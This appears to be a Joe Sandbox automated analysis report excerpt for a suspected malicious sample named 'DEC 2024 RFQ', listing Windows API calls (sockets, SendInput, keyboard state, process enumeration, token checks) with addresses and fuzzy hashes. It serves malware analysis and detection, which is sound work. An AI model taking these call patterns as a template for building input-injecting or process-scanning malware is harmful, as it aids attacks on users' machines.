                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3659485706-0
                                                                                                                      • Opcode ID: fd93e133110e8f448ddf09a05554ea583ab6a87075afb68710a7ef05ad5d0a37
                                                                                                                      • Instruction ID: 740c699713997a084872c0038c054f07219ab581c12d6367e5a4ec3f78df9a3c
                                                                                                                      • Opcode Fuzzy Hash: fd93e133110e8f448ddf09a05554ea583ab6a87075afb68710a7ef05ad5d0a37
                                                                                                                      • Instruction Fuzzy Hash: D0C14671A083519FCB54DF28C480A6ABBE4FF89714F04896EF8999B352D731ED45CB82
                                                                                                                      APIs
                                                                                                                      • CoInitialize.OLE32(00000000), ref: 000980C3
                                                                                                                      • CoUninitialize.OLE32 ref: 000980CE
                                                                                                                        • Part of subcall function 0007D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0007D5D4
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 000980D9
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 000983AA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 780911581-0
                                                                                                                      • Opcode ID: cdf04b1abe16ae09e5bda5325e604864b9e49de249d7fea1bcd307d6c932097b
                                                                                                                      • Instruction ID: b629eb602aaa419d5646cdf2eb062b2f4b9ab68616663d188a303325ef3897ca
                                                                                                                      • Opcode Fuzzy Hash: cdf04b1abe16ae09e5bda5325e604864b9e49de249d7fea1bcd307d6c932097b
                                                                                                                      • Instruction Fuzzy Hash: 6CA18A756047119FCB50DF64C881B6AB7E4BF8A714F08845CF99A9B3A2CB34ED04DB86
                                                                                                                      APIs
                                                                                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,000B2C7C,?), ref: 000776EA
                                                                                                                      • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,000B2C7C,?), ref: 00077702
                                                                                                                      • CLSIDFromProgID.OLE32(?,?,00000000,000AFB80,000000FF,?,00000000,00000800,00000000,?,000B2C7C,?), ref: 00077727
• _memcmp.LIBCMT ref: 00077748
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: FromProg$FreeTask_memcmp
• String ID:
• API String ID: 314563124-0
• Opcode ID: 6d39748456af2a2a0318d379a9525729241fd6816f59d16f3c70ee20c57761d1
• Instruction ID: 80857824b3ce2ae67946fa496a8eed301344905ef7eba0dac35d5c60db25eb77
• Opcode Fuzzy Hash: 6d39748456af2a2a0318d379a9525729241fd6816f59d16f3c70ee20c57761d1
• Instruction Fuzzy Hash: DE812B75E00109EFCB04DFA4C984EEEB7B9FF89355F208558E509AB250DB75AE06CB60
APIs
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: Variant$AllocClearCopyInitString
• String ID:
• API String ID: 2808897238-0
• Opcode ID: 04e55d49ba32d90d7180064e6f43a560045006a027271d22013876c166b494d2
• Instruction ID: c29fb11be491d452416f816f6531f004b138592dbe13514d35a85e0626a1ab81
• Opcode Fuzzy Hash: 04e55d49ba32d90d7180064e6f43a560045006a027271d22013876c166b494d2
• Instruction Fuzzy Hash: 8B51C774E00B01AADB60AF65D89167EB3E5AF45310F20C81FE58FD7292DB39D840CB19
APIs
• GetWindowRect.USER32(016FD890,?), ref: 000A9863
• ScreenToClient.USER32(00000002,00000002), ref: 000A9896
• MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 000A9903
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: Window$ClientMoveRectScreen
• String ID:
• API String ID: 3880355969-0
• Opcode ID: fb7b3005007181ae0b434a2714fba0115cf3b639056bb79fb5e67d4a77b56c28
• Instruction ID: a16f8856331d8fb3c56573bfb9d888141657ed4f335095a0a928bd13218a93e6
• Opcode Fuzzy Hash: fb7b3005007181ae0b434a2714fba0115cf3b639056bb79fb5e67d4a77b56c28
• Instruction Fuzzy Hash: 1B515F34A00609EFDF10CFA8C980AAE7BF5FF46360F148559F955AB2A0DB34AD41CB90
APIs
• SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00079AD2
• __itow.LIBCMT ref: 00079B03
  • Part of subcall function 00079D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00079DBE
• SendMessageW.USER32(?,0000110A,00000001,?), ref: 00079B6C
• __itow.LIBCMT ref: 00079BC3
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: MessageSend$__itow
• String ID:
• API String ID: 3379773720-0
• Opcode ID: db4f07b34ad24f4a67a562a9090d748c375aaf1275ab8837dd5a3161107250a6
• Instruction ID: 7bca956d1cb1b8e93184224bdb0c9e75365b0fbb3d6c10a41fdff001338eefcb
• Opcode Fuzzy Hash: db4f07b34ad24f4a67a562a9090d748c375aaf1275ab8837dd5a3161107250a6
• Instruction Fuzzy Hash: D7419D74A00218ABDF21EF64D846FEE7BB9EF45710F004069F909A7292DB749A44CBA5
APIs
• socket.WSOCK32(00000002,00000002,00000011), ref: 000969D1
• WSAGetLastError.WSOCK32(00000000), ref: 000969E1
  • Part of subcall function 00029837: __itow.LIBCMT ref: 00029862
  • Part of subcall function 00029837: __swprintf.LIBCMT ref: 000298AC
• #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00096A45
• WSAGetLastError.WSOCK32(00000000), ref: 00096A51
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: ErrorLast$__itow__swprintfsocket
• String ID:
• API String ID: 2214342067-0
• Opcode ID: 779b26d606b4b6a86cbf1a7c71d6d6d694538bcd96778c1b1261c7367e538bfe
• Instruction ID: 93fcaf1c9cde59245adf2956c984af8e28bca0bd8b41d26670d87c23a3be3185
• Opcode Fuzzy Hash: 779b26d606b4b6a86cbf1a7c71d6d6d694538bcd96778c1b1261c7367e538bfe
• Instruction Fuzzy Hash: 9E41AE75740210AFEB60AF64DC86FBE77E8AF05B14F44C058FA59AB2C3DA759D008B91
APIs
• #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,000AF910), ref: 000964A7
• _strlen.LIBCMT ref: 000964D9
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: _strlen
• String ID:
• API String ID: 4218353326-0
• Opcode ID: f1b2531db1a9bb740bd59363a768f03e1048f87f92167722bfdd4545f1958692
• Instruction ID: 8e024129dad1baf7225539136f208f9920c65dc172a292f38a18c809fa931cd3
• Opcode Fuzzy Hash: f1b2531db1a9bb740bd59363a768f03e1048f87f92167722bfdd4545f1958692
• Instruction Fuzzy Hash: B741DF71A00514ABCF14EBA8EC95FFEB7A8AF05310F108165F81A9B293EB31ED04DB54
APIs
• CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0008B89E
• GetLastError.KERNEL32(?,00000000), ref: 0008B8C4
• DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0008B8E9
• CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0008B915
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: CreateHardLink$DeleteErrorFileLast
• String ID:
• API String ID: 3321077145-0
• Opcode ID: 743e61343ceb8d29e0b910fb12d5d880dd5637b9131b74e0054f7a9392fa2fc0
• Instruction ID: 4def26d77c1a7a86fecf8581cf0d8316e9f290fc223529ad69722da0b90d82fc
• Opcode Fuzzy Hash: 743e61343ceb8d29e0b910fb12d5d880dd5637b9131b74e0054f7a9392fa2fc0
• Instruction Fuzzy Hash: 2B411839600A21DFCB11EF55D584A9DBBE1BF4A710F198099EC8A9B362CB34FD01CB95
APIs
• InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 000A88DE
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: InvalidateRect
• String ID:
• API String ID: 634782764-0
• Opcode ID: 5d60aa7a6572b136123efe1d3879286582f3bbc8df6f8aadd4a3f15276b215db
• Instruction ID: 3ab42ee9f4dca06c331eb5b6bd96547ab97c2f3046bdce607b0fcf7f855446ec
• Opcode Fuzzy Hash: 5d60aa7a6572b136123efe1d3879286582f3bbc8df6f8aadd4a3f15276b215db
• Instruction Fuzzy Hash: BF31D234600109BFEB709AE8CC85BFE77B5EB07310F688512FA51E61A1CE74D9409752
APIs
• ClientToScreen.USER32(?,?), ref: 000AAB60
• GetWindowRect.USER32(?,?), ref: 000AABD6
• PtInRect.USER32(?,?,000AC014), ref: 000AABE6
• MessageBeep.USER32(00000000), ref: 000AAC57
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: Rect$BeepClientMessageScreenWindow
• String ID:
• API String ID: 1352109105-0
• Opcode ID: e53813992ae3f88ac8fe821cdebdc85958c57e018bc9c6643938c24ced5585b4
• Instruction ID: ea2184cf661c148388b770fc25a85c70b3bacfb3a74b78a28476cae86a0d7cbc
• Opcode Fuzzy Hash: e53813992ae3f88ac8fe821cdebdc85958c57e018bc9c6643938c24ced5585b4
• Instruction Fuzzy Hash: CD418230700519DFEB21DF98C884BA97BF5FB4B721F1484A9E415AF2A1D731E841CB92
APIs
• GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00080B27
• SetKeyboardState.USER32(00000080,?,00000001), ref: 00080B43
• PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00080BA9
• SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00080BFB
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 432972143-0
                                                                                                                      • Opcode ID: 6491b6d43091a765c4b771c7bdf08d9ccefa893360e632e17b2a1fb88e3b5500
                                                                                                                      • Instruction ID: 897d141c1320ff0c1f7b454ef6b9cc9a9a41ebbedcb2f0331a454c78c6e08fa7
                                                                                                                      • Opcode Fuzzy Hash: 6491b6d43091a765c4b771c7bdf08d9ccefa893360e632e17b2a1fb88e3b5500
                                                                                                                      • Instruction Fuzzy Hash: 4E315830E40618AFFFB0AB658C05BFEBBE9BF45328F08826AE5D0521D1C37989489755
                                                                                                                      APIs
                                                                                                                      • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00080C66
                                                                                                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 00080C82
                                                                                                                      • PostMessageW.USER32(00000000,00000101,00000000), ref: 00080CE1
                                                                                                                      • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00080D33
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 432972143-0
                                                                                                                      • Opcode ID: 648007844425a600df1e6eeecbc3047d8d96ee486d8acd7ce04e297757578b4e
                                                                                                                      • Instruction ID: b4face45b8d6768f961757be05625bdb9383b51d44033e1fbe7897b3a2b4e3e6
                                                                                                                      • Opcode Fuzzy Hash: 648007844425a600df1e6eeecbc3047d8d96ee486d8acd7ce04e297757578b4e
                                                                                                                      • Instruction Fuzzy Hash: 00312630D40718AEFFB0AFA5C8157FEBBA6BB45320F04832AE4C5521D1D37999598792
                                                                                                                      APIs
                                                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 000561FB
                                                                                                                      • __isleadbyte_l.LIBCMT ref: 00056229
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00056257
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0005628D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3058430110-0
                                                                                                                      • Opcode ID: bc95bb96ed839ba3eedd9ef4cda9972d1b21cc298436285dbcfc8daee6096cbf
                                                                                                                      • Instruction ID: 0e07b2e3b35ea3c91349efba117c044ec33c5294e47a0a47054e468f72ca4978
                                                                                                                      • Opcode Fuzzy Hash: bc95bb96ed839ba3eedd9ef4cda9972d1b21cc298436285dbcfc8daee6096cbf
                                                                                                                      • Instruction Fuzzy Hash: 0631CE30604A46AFDF218FA5CC44BBB7BE9FF42352F554128EC64871A1DB32E954DB90
                                                                                                                      APIs
                                                                                                                      • GetForegroundWindow.USER32 ref: 000A4F02
                                                                                                                        • Part of subcall function 00083641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0008365B
                                                                                                                        • Part of subcall function 00083641: GetCurrentThreadId.KERNEL32 ref: 00083662
                                                                                                                        • Part of subcall function 00083641: AttachThreadInput.USER32(00000000,?,00085005), ref: 00083669
                                                                                                                      • GetCaretPos.USER32(?), ref: 000A4F13
                                                                                                                      • ClientToScreen.USER32(00000000,?), ref: 000A4F4E
                                                                                                                      • GetForegroundWindow.USER32 ref: 000A4F54
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2759813231-0
                                                                                                                      • Opcode ID: 245c40ee300cff9cba4b9bb9a4e27f00453ee4e3cb4b870913f26db802123197
                                                                                                                      • Instruction ID: ca3718cac66bfd4e2dd3f4ac20d0ba97dfe63e7800c034a2ffec64309fc301d7
                                                                                                                      • Opcode Fuzzy Hash: 245c40ee300cff9cba4b9bb9a4e27f00453ee4e3cb4b870913f26db802123197
                                                                                                                      • Instruction Fuzzy Hash: 49313E71D00118AFDB00EFB5D8859EFB7F9EF89300F10446AE415E7202EA759E058BA0
                                                                                                                      APIs
                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00083C7A
                                                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00083C88
                                                                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 00083CA8
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00083D52
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 420147892-0
                                                                                                                      • Opcode ID: 987a6f8701bf7d92b21c0ad9e425e89426ba8e61457854d5a70de30c5c34bde1
                                                                                                                      • Instruction ID: dbce60baec52dc4066188a517bb66b5e3783d6ccd3f0b357572ff8a19f5d3fd5
                                                                                                                      • Opcode Fuzzy Hash: 987a6f8701bf7d92b21c0ad9e425e89426ba8e61457854d5a70de30c5c34bde1
                                                                                                                      • Instruction Fuzzy Hash: B8318D711083059FD310EF50E885ABFBBE8BF95354F50082DF4C5861A2EB719A49CB92
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00022612: GetWindowLongW.USER32(?,000000EB), ref: 00022623
                                                                                                                      • GetCursorPos.USER32(?), ref: 000AC4D2
                                                                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0005B9AB,?,?,?,?,?), ref: 000AC4E7
                                                                                                                      • GetCursorPos.USER32(?), ref: 000AC534
                                                                                                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0005B9AB,?,?,?), ref: 000AC56E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2864067406-0
                                                                                                                      • Opcode ID: f9bb497b79f01ff423faef5b684e323a50458c45e219d848b0dd5c947a6d9387
                                                                                                                      • Instruction ID: 30cdb499f7a654fae2591facf7b75889ce9dab86a16bd4ed91f815de6b12d6a7
                                                                                                                      • Opcode Fuzzy Hash: f9bb497b79f01ff423faef5b684e323a50458c45e219d848b0dd5c947a6d9387
                                                                                                                      • Instruction Fuzzy Hash: 8E31C535900858EFEB258FA8C858DFA7BF5EF0A710F054055F9059B261C7356D50DB94
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0007810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00078121
                                                                                                                        • Part of subcall function 0007810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0007812B
                                                                                                                        • Part of subcall function 0007810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0007813A
                                                                                                                        • Part of subcall function 0007810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00078141
